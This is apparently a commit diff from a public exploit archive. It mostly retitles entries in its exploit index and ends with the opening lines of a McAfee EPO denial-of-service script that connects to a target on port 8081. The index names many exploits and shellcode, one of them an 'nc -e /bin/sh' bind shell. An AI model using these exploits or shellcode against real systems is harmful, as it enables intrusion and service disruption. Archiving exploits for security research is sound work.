DB: 2015-08-05

2015-08-05 05:02:03 +00:00 · 2015-08-05 05:02:03 +00:00 · a6cc99bac3
commit a6cc99bac3
parent 4378e58667
16 changed files with 1430 additions and 1430 deletions
--- a/files.csv
+++ b/files.csv
@ -459,7 +459,7 @@ id,file,description,date,author,platform,type,port
 593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server Remote DoS",2004-10-24,KaGra,windows,dos,0
 594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0
 598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25
-599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
+599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
 600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0
 601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0
 602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0
@ -510,7 +510,7 @@ id,file,description,date,author,platform,type,port
 659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0
 660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
 662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0
-663,platforms/windows/remote/663.py,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
+663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
 664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0
 665,platforms/windows/dos/665.c,"Orbz Game <= 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0
 667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0
@ -1147,9 +1147,9 @@ id,file,description,date,author,platform,type,port
 1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105
 1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0
 1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0
-1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
+1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
 1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
-1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
+1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
 1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21
 1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0
 1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0
@ -1690,7 +1690,7 @@ id,file,description,date,author,platform,type,port
 1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0
 1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability",2006-07-05,Kw3[R]Ln,php,webapps,0
 1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0
-1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0
+1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0
 1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french)",2006-07-06,NSRocket,windows,local,0
 1987,platforms/asp/webapps/1987.txt,"Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability",2006-07-06,"Soroush Dalili",asp,webapps,0
 1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian)",2006-07-06,oveRet,windows,local,0
@ -1951,7 +1951,7 @@ id,file,description,date,author,platform,type,port
 2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass Vulnerability",2006-08-25,Vipsta,php,webapps,0
 2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0
 2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability",2006-08-25,Kacper,php,webapps,0
-2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110
+2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110
 2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability",2006-08-26,Kacper,php,webapps,0
 2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0
 2261,platforms/php/webapps/2261.php,"iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0
@ -3274,7 +3274,7 @@ id,file,description,date,author,platform,type,port
 3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability",2007-03-30,bd0rk,php,webapps,0
 3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 (login.php table) Local File Inclusion Vulnerability",2007-03-30,GoLd_M,php,webapps,0
 3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53
-3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
+3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
 3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0
 3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
 3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
@ -3677,7 +3677,7 @@ id,file,description,date,author,platform,type,port
 4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0
 4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0
 4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0
-4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080
+4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080
 4028,platforms/linux/local/4028.txt,"screen 4.0.3 - Local Authentication Bypass Vulnerability (OpenBSD)",2008-06-18,Rembrandt,linux,local,0
 4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0
 4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0
@ -4216,7 +4216,7 @@ id,file,description,date,author,platform,type,port
 4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit",2007-10-27,bunker,multiple,local,0
 4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit (2)",2007-10-27,bunker,multiple,local,0
 4572,platforms/multiple/local/4572.txt,"Oracle 10g LT.FINDRICSET Local SQL Injection Exploit (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
-4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581
+4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581
 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143
 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0
 4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability",2007-10-28,ZynbER,php,webapps,0
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
 4654,platforms/php/webapps/4654.txt,"PBLang <= 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
 4655,platforms/php/webapps/4655.txt,"project alumni <= 1.0.9 - Remote XSS / SQL Injection Vulnerability",2007-11-24,tomplixsee,php,webapps,0
 4656,platforms/php/webapps/4656.txt,"RunCMS <= 1.6 - Local File Inclusion Vulnerability",2007-11-24,BugReport.IR,php,webapps,0
-4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
+4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
 4658,platforms/php/webapps/4658.php,"RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0
 4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion Vulnerability",2007-11-25,ShAy6oOoN,php,webapps,0
 4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,IRCRASH,php,webapps,0
@ -4366,7 +4366,7 @@ id,file,description,date,author,platform,type,port
 4721,platforms/php/webapps/4721.txt,"Wordpress <= 2.3.1 - Charset Remote SQL Injection Vulnerability",2007-12-11,"Abel Cheung",php,webapps,0
 4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion Vulnerability",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
 4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu <= 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0
-4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80
+4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80
 4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0
 4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 head.php Remote File Inclusion Vulnerability",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0
 4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability",2007-12-13,MurderSkillz,php,webapps,0
@ -4974,8 +4974,8 @@ id,file,description,date,author,platform,type,port
 5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0
 5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0
 5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510
-5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
+5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
-5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP Denial of Service Exploit",2008-04-02,muts,windows,dos,0
+5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service Exploit",2008-04-02,muts,windows,dos,0
 5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability",2008-04-02,NoGe,php,webapps,0
 5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0
 5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
@ -5092,7 +5092,7 @@ id,file,description,date,author,platform,type,port
 5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion Vulnerability",2008-04-17,by_casper41,php,webapps,0
 5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0
 5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG Wireless Driver Remote BoF Exploit (meta)",2008-04-17,oveRet,windows,remote,0
-5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0
+5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - .SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0
 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability",2008-04-18,MajnOoNxHaCkEr,php,webapps,0
 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability",2008-04-18,"Aria-Security Team",php,webapps,0
 5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0
@ -6951,7 +6951,7 @@ id,file,description,date,author,platform,type,port
 7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection Vulnerability",2008-12-10,"Hussin X",php,webapps,0
 7408,platforms/php/webapps/7408.txt,"living Local 1.1 (xss-rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0
 7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0
-7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (vista) (0day)",2008-12-10,muts,windows,remote,0
+7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (Vista) (0day)",2008-12-10,muts,windows,remote,0
 7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability",2008-12-10,Osirys,php,webapps,0
 7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 (sql/dd) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0
 7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0
@ -9020,7 +9020,7 @@ id,file,description,date,author,platform,type,port
 9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
 9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0
 9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0
-9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
+9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
 9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0
 9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0
 9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0
@ -12519,7 +12519,7 @@ id,file,description,date,author,platform,type,port
 14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0
 14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
 14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0
-14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 Admin Interface DoS",2010-07-06,muts,windows,dos,8800
+14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface DoS",2010-07-06,muts,windows,dos,8800
 14235,platforms/linux/shellcode/14235.c,"nc -lp 31337 -e /bin//sh polymorphic linux shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
 14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0
 14238,platforms/php/webapps/14238.txt,"BS Auction <= SQL Injection Vulnerability Exploit",2010-07-06,"Easy Laster",php,webapps,0
@ -17259,7 +17259,7 @@ id,file,description,date,author,platform,type,port
 19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS Vulnerability",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0
 19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console Vulnerability",2000-05-03,"Michal Zalewski",linux,local,0
 19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 Vulnerability",2000-05-16,"Stephen Friedl",hardware,remote,0
-20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0
+20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0
 19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 Environmental Variables Disclosure Vulnerability",2000-05-10,"Black Watch Labs",multiple,remote,0
 19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability",2000-05-11,"Ussr Labs",windows,dos,0
 19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability",2000-05-11,"Cerberus Security Team",windows,remote,0
@ -17379,17 +17379,17 @@ id,file,description,date,author,platform,type,port
 20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0
 20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0
 20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0
-20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0
+20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0
 20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS - blind SQLi - rce",2012-07-22,muts,asp,webapps,0
 20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0
 20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0
-20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0
+20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0
 20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 DoS Vulnerability",2000-06-25,"MDMA Crew",windows,dos,0
 20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow Vulnerability",2000-06-27,UNYUN,windows,remote,0
 20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 File Access Vulnerability",2000-06-26,"Larry W. Cashdollar",cgi,remote,0
 20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 Weak Password Encryption Vulnerability",2000-06-26,"Larry W. Cashdollar",unix,local,0
 20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - _SUMMON_ Buffer Overflow Vulnerability",2000-06-29,"Matt Conover",linux,remote,0
-20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0
+20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0
 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0
 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0
 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0
@ -17406,7 +17406,7 @@ id,file,description,date,author,platform,type,port
 20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override Vulnerability",2000-07-04,"Adrian Daminato",cgi,remote,0
 20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - _/INVITE_ Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0
 20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0
-20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
+20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
 20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0
 20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
 20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure Vulnerability",2000-07-08,"Andrew Lewis",windows,remote,0
@ -17431,7 +17431,7 @@ id,file,description,date,author,platform,type,port
 20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability",2000-07-18,Prizm,cgi,remote,0
 20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0
 20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0day)",2012-07-24,muts,php,webapps,0
-20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
+20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0
 20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0
 20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0
@ -17696,7 +17696,7 @@ id,file,description,date,author,platform,type,port
 20365,platforms/php/webapps/20365.py,"Wordpress Plugin ThreeWP Email Reflector 1.13 - Stored XSS",2012-08-08,loneferret,php,webapps,0
 20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
 20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
-20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 POST File Read",2012-08-08,muts,windows,webapps,0
+20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,windows,webapps,0
 20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 PASV Mode FTP Internal Address Disclosure Vulnerability",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
 20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution Vulnerability",2000-10-29,"Mark Stratman",cgi,remote,0
 20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability",1995-10-30,"Dan Shearer",windows,remote,0
--- a/platforms/windows/dos/5343.py
+++ b/platforms/windows/dos/5343.py
@ -1,75 +1,75 @@
-#!/usr/bin/python
+#!/usr/bin/python
-# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
+# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
-# More than meets the eye
+# More than meets the eye
-# Discovered and coded by Mati Aharoni
+# Discovered and coded by Mati Aharoni
-# muts..at..offensive-security.com
+# muts..at..offensive-security.com
-# http://www.offensive-security.com/0day/mcafee_again.py.txt
+# http://www.offensive-security.com/0day/mcafee_again.py.txt
-
+
-
+
-# EAX 00840C30
+# EAX 00840C30
-# ECX 00837830
+# ECX 00837830
-# EDX 01EACF18
+# EDX 01EACF18
-# EBX 00004000
+# EBX 00004000
-# ESP 01EAFF04
+# ESP 01EAFF04
-# EBP 01EAFF38
+# EBP 01EAFF38
-# ESI 00837830
+# ESI 00837830
-# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
+# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
-# EIP 42424242
+# EIP 42424242
-
+
-import socket
+import socket
-import os
+import os
-import sys
+import sys
-from time import sleep
+from time import sleep
-
+
-expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
+expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
-expl.connect ( ( sys.argv[1], 8081 ) )
+expl.connect ( ( sys.argv[1], 8081 ) )
